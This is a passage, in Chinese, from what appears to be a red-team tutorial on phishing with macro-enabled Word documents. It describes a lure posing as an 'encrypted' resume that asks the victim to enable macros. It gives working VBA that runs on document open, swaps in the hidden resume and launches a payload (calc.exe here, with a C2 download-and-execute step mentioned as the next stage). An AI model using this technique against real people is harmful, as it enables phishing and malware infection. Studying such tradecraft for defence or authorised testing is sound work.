社会工程学攻击
在上一章,我们为社会工程学攻击做足了准备。社会工程学攻击不止钓鱼,并且钓鱼攻击也不止发送带有宏的恶意文档,但我们不妨先从此入手。我们之前说了,虽然宏并没有被所有企业默认禁用考虑到其具有一定作用,但我们不能保证接收到恶意文档的对象的Office设置是默认开启宏的。这种情况下,我们需要先诱导对方开启宏设置,怎么做到呢?这里提供一个案例。
Word有个特性叫自动图文集,即可以把特定内容保存进去,当然也可以在后续把保存的图文集提取出来插入到文档中。这个特定配合特定的 macro 脚本,可以实现伪加密效果。
1:新建一个 doc 或者 docm 文档,填写一些可信的内容,例如个人简历。
2:选中内容,将所选的内容保存到自动图文集中(插入 ->文档部件 -> 自动图文集)
3:删除个人简历内容,填写语境,例如 “出于个人隐私考虑,该文档进行了加密,请启用宏以解密该文档查看个人简历”
4:编辑宏,插入宏代码用于删除当前页面并且插入保存的图文集。
ActiveDocument.Content.Select
Selection.Delete
ActiveDocument.AttachedTemplate.AutoTextEntries("dler").Insert Where:=Selection.Range, RichText:=True
5:当受害者打开文档时,显示的是一份“加密”的文档,即我们的语境,点击启用宏之后,当前的内容会被宏删除,并且插入自动图文集中保存的内容,即我们的简历。
未开启宏之前:
开启宏之后:
6:在此基础上,加上载荷,出于测试目的,我们的载荷为 calc.exe
7:打开文档,受害者启用宏,计算器便弹出来了。
Function phishing()
ActiveDocument.Content.Select
Selection.Delete
ActiveDocument.AttachedTemplate.AutoTextEntries("dler").Insert Where:=Selection.Range, RichText:=True
Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "calc"
End Function
Sub Document_Open()
phishing
End Sub
Sub AutoOpen()
phishing
End Sub
8:但此时,如果我们将载荷替换为 C2 的下载与执行,还不足以通过杀毒软件的检测。我们会在后面的章节进行更深层次的载荷构造。